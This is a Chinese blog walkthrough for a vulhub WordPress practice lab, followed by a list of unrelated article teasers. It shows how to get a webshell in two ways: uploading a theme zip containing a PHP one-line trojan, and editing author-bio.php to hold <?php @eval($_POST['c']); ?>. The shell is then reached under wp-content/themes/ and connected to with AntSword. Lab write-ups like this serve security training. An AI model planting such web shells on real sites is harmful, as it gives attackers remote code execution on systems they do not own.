vulhub-wordpress靶场

embedded/2024/12/30 19:02:51/

一.主题上传漏洞

来到靶场点击主题选择add new

这里有一个上传主题的地方

我们可以去网上找到wordpress主题下载一个

wordpress模板 网页设计模板 免费 免费下载 - 爱给网

下载完成后对我们有用的东西只有这一个目录,把它拖出来

点开moban目录后,创建一个php文件,写一个一句话木马

将这个目录改名为moban并且压缩

去上传

上传成功,我们去搜一下这个cms类型的绝对路径

搜索:wordpress主题上传的路径wp-content/themes/

我们去访问一下这个文件

用蚁剑连接一下

连接成功

二.编辑文件漏洞

来到主题,选择editor再选择author-bio.php

将里面的内容改为一句话木马

全部删除改为:<?php @eval($_POST['c']); ?>

改完之后记得提交

这里就是他的路径,试着访问一下,显示not found

我们把Twenty Fifteen改为twentyfifteen

发现访问到了,去用蚁剑连接一下,连接成功


http://www.ppmy.cn/embedded/149719.html

相关文章

不用swipe插件,用<component>组件实现H5的swipe切换

不引入 swipe 插件&#xff0c;使用vue自带组件实现swipe滑动切换页面功能 需求场景1. 引入组件2. 动态加载页面组件3. 使用component组件4. 组件属性及相关事件5. 触摸事件处理6. 动画和过渡控制7. 节流功能 完整代码 需求场景 不引入 swipe 插件&#xff0c;使用vue自带comp…

详细讲解axios封装与api接口封装管理

一、axios封装 axios是基于promise的http客户端&#xff0c;用于浏览器和nodejs发送http请求 &#xff0c;对它进行封装主要是为了统一管理请求配置和处理请求和响应的通用逻辑等。以下是常用的封装逻辑和要点 1&#xff1a;引入axios相关依赖 首先引用项目中的axios库&…

【JavaEE】Spring Web MVC

目录 一、Spring Web MVC简介 1.1 MVC简介1.2 Spring MVC1.3 RequestMapping注解1.3.1 使用1.3.2 RequestMapping的请求设置 1.3.2.1 方法11.3.2.2 方法2 二、Postman介绍 2.1 创建请求2.2 界面如下&#xff1a;2.3 传参介绍 一、Spring Web MVC简介 官方文档介绍&#xff…

设计模式之模板方法模式:咖啡,茶,和代码

~犬&#x1f4f0;余~ “我欲贱而贵&#xff0c;愚而智&#xff0c;贫而富&#xff0c;可乎&#xff1f; 曰&#xff1a;其唯学乎” 一、模板方法模式概述 \quad 在我们的日常生活中,经常会遇到这样的场景:不同的事物,却有着相似的处理流程。比如泡茶和冲咖啡,虽然最终的饮品不同…

用 ElementUI 的日历组件 Calendar 自定义渲染

文章目录 需求分析1. 页面渲染2. 获取页面上的开始日期和结束日期3. 总的代码 需求 之前实现过一版用 ElementPlus 的日历组件 Calendar 自定义渲染&#xff0c;是在 Vue3 项目中实现的&#xff0c;现在需求在 Vue2 中也实现一版 分析 1. 页面渲染 <el-calendar v-model&q…

【每日学点鸿蒙知识】Web请求支持Http、PDF展示、APP上架应用搜索问题、APP备案不通过问题、滚动列表问题

1、HarmonyOS Web不支持http请求&#xff0c;只支持https&#xff1f; Web组件http请求失败&#xff0c;改成https是好的&#xff0c;是否可以通过配置打开http的请求 参考文档&#xff1a;https://developer.huawei.com/consumer/cn/doc/harmonyos-references-V5/ts-basic-c…

《类和对象:基础原理全解析(中篇)》

目录 一、 类成员函数的 this 指针1. this 指针的使用2. this 指针的注意事项 二、const 成员函数1. const 关键字的添加位置2. const 成员函数的使用建议 三、析构函数1. 拷贝构造函数的使用2. 使用析构函数的注意事项 四、拷贝构造函数1. 使用默认拷贝构造函数的 Stack 类2. …

从零开始学AI,完成AI 企业知识库的AI问答搭建

1&#xff1a;本地安装一个ollama玩下&#xff0c;ollama下载模型默认路径为C盘&#xff0c;但该盘空间不足。 解决方案&#xff1a;添加系统环境变量OLLAMA_MODELS&#xff0c;设置其值为新的路径。 2&#xff1a;安装完成后&#xff0c;访问http://127.0.0.1:11434/ 查看服务…